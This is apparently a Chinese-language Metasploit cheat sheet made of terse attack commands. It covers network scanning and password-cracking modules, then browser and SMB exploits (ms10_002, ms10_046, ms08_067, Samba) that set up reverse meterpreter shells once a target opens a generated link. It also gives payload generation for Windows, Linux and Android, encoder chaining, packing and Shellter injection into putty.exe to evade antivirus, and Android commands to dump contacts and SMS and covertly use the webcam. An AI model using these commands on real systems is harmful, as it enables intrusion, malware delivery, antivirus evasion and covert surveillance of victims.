service postgresql start
service metasploit startmsfconsole进入后输入db_status 查看数据库连接状态workspace -a test 创建工作台Workspace test 进入工作台信息收集 msf> whois xxx.com msf>whois 192.168.1.100 在线收集服务器ip信息工具 : http://searchdns.netcraft.com/ nmap -sS xxx (-O 看操作系统) msf>use auxiliary/scanner/ip/ipidseq 看某个网段谁开了**端口。 show options 看配置。set ** 设置。run 开始 msf>use auxiliary/scanner/portscan/syn 扫描开放端口 set RHOSTS *** 。set THREADS 50 msf>use auxiliary/scanner/smb/smb_version 扫描网段开放445的 。 set RHOSTS 192.168.2.0/24 。set THREADS 50 msf>use auxiliary/scanner/mssql/mssql_ping 扫描开放mssql msf>use auxiliary/scanner/ssh/ssh_version 扫描网段ssh服务器 msf>use auxiliary/scanner/telnet/telnet_version 扫描网段telnet msf>use auxiliary/scanner/ftp/ftp_version 扫描网段ftp msf>use auxiliary/scanner/ftp/anonymous 扫描网段ftp可匿名登录的 msf>use auxiliary/scanner/discovery/arp_sweep 存活主机 msf>use auxiliary/scanner/http/dir_scanner 网站目录 msf>use auxiliary/scanner/snmp/snmp_login 扫描snmp主机 msf>use auxiliary/gather/search_email_collector 搜索网站中email地址 set DOMAIN **.com msf>use auxiliary/sniffer/psnuffle 嗅探抓包(ftp密码) search mysql_login 搜索mysql口令破解模块,并利用 search postgre_login 搜索post sql口令破解模块 telnet search tomcat_mgr_login 搜索tomcat口令破解模 search ssh_login 搜索ssh口令破解模块 msf>use auxiliary/scanner/smb/samba_version 破解samba微软等漏洞利用 如 ms10_002 (浏览器漏洞): msf>search ms10_002 msf>use exploit/windows/browser/ms10_002_aurora msf>set SRVHOST 192.168... 本机ip msf>set payload windows/meterpreter/reverse_tcp 侦听反弹shell载荷 msf>set SRVPORT 80 接受的端口 不设置默认8080 msf>set URIPATH / 可有无 根目录 msf>set LHOST 192.168... 本机ip msf>set LPORT 1211 本地端口 msf>exploit 攻击 会有生成一个网址 给目标打开,之后返回 一些信息 session 1 之后 输入 msf>session -i 查看会话和id* 使用 msf>sessions -i * meterpreter>shell 获得shell 可输入cmd命令ipconfig whoami ctrl z 退出 ctrl c 后台运行———————— ms10_018 (浏览器漏洞): msf>search ms10_018 msf>set SRVHOST 192.168... 本机ip msf>set SRVPORT 8081 注意冲突 msf>set payload windows/shell/reverse_tcp 用shell 攻击性低 msf>set LHOST 192.168... 本机ip msf>set LPORT 1211 本地端口 msf>exploit 攻击 会有生成一个网址 给目标打开 输入 msf>session -i 查看会话和id* ————————*****蓝屏 ms12_020 (需要开3389 在win 输入netstat -an |find“3389” 查) search 结果 第二个搜索漏洞 第一个利用———————— ms10_046 (范围广泛) msf>set SRVHOST 192.168... msf>set SRVPORT 80 msf>set payload windows/shell/reverse_tcp msf>set LHOST 192.168... msf>set LPORT 生成两个 一个是共享(//***)另个为网址 转化后和第一个一样 里面有文件,打开即可———————— ms08_067 (早期,测试,范围广) msf>use msf>set RHOST ***(mubiao) msf>s (show target) msf>set target ** 填目标版本对应的id———————— ms12_004 浏览器 xpsp3 ,ie 6 7 8 * msf>use msf>set payload windows/meterpreter/reverse_tcp msf>set SRVHOST 192.168... msf>set SRVPORT ** msf>set LHOST 192.168... msf>set LPORT exploit ———————— linux samba 漏洞 适应版本 debain 3.1*3.2 search samba use linux/samba/lsa_transnames_heap show payload set payload linux /x86/shell_bind_tcp ? set LPORT 8080 set RHOST 192.168 exploit———————— dll 注入(到目标系统) use exploit/windows/browser/wendab_dll_hijacker msf>set payload windows/meterpreter/reverse_tcp msf>set SRVHOST 192.168... msf>set SRVPORT 80 必须80 msf>set RHORT ** msf>set LHOST 192.168... msf>set LPORT msf>set urlpath /———————————————————————————————————————————————— shellcode 使用 (少于远控 功能单一 可以生成 windows linux andriond java php)—————— windows -# msfpayload windows/meterpreter/reverse_tcp LHOST=** LPORT=1211 X >shy.exe **** ****编码免杀 (-t 输出形式;-c编码次数,次数过多可能会使shellcode失 效;-e 加编码类型 ;可用msfencode -l 查看所有编码) -# msfpayload windows/meterpreter/reverse_tcp LHOST=** LPORT=1211 R|msfencode -e x86/shikata_ga_nai -c 5 -t raw |msfencode -e x86/alpha_upper -c 2 -t raw |msfencode -e x86/countdown -c 5 -t exe -o /root/shy.exe **** ****加壳免杀 (upx壳) -#upx -5 shy.exe **** ****veil 免杀 **** ****shellter免杀 (shellcode代码注入工具)找一个正常运行的exe,如putty.exe,向其注入。将工具shellterv4放入kali,解压unzip shellter_v4.0.zip,进入所解压的目录,运行shellter.exe(提升其权限,chmod 777 shellter.exe).(A/M/H,选A).PE Target: /root/putty.exe (L/C/H 选L 后输入1)。set LHOST: *** 。 SET LPORT ** 。 配置监听载荷: msf>use payload windows/meterpreter/reverse_tcp msf>set LHOST ** msf>set LPORT ** **** **** msf>use exploit/multi/handler msf>set payload windows/meterpreter/reverse_tcp msf>set LHOST ***133 msf>set LPORT 一致 exploit 可以用 -# msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=* LPORT=* E—————— linux -# msfpayload linux/x86/meterpreter/reverse_tcp LHOST=** LPORT=1211 X >/root/shy.exe 监听 msf>use exploit/multi/handler msf>set payload linux /x86/meterpreter/reverse_tcp msf>set LHOST ***133 msf>set LPORT 一致 exploit 可以用 -# msfcli exploit/multi/handler PAYLOAD=linux/x86/meterpreter/reverse_tcp LHOST=* LPORT=* E在目标linux中修改exe权限 # chmod 777 shy。exe然后。/shy 执行——————android -# msfpayload andriod/meterpreter/reverse_tcp LHOST=** LPORT=1211 R>/root/shy.apk 监听 msf>use exploit/multi/handler msf>set payload andriod/meterpreter/reverse_tcp msf>set LHOST ***133 msf>set LPORT 一致 exploit dump_contacts 到出电话 dump_sms Webcam_list 看有几个摄像头 -i 1 选择后面摄像头 webcam_snap 拍照 webcam_stream 开摄像头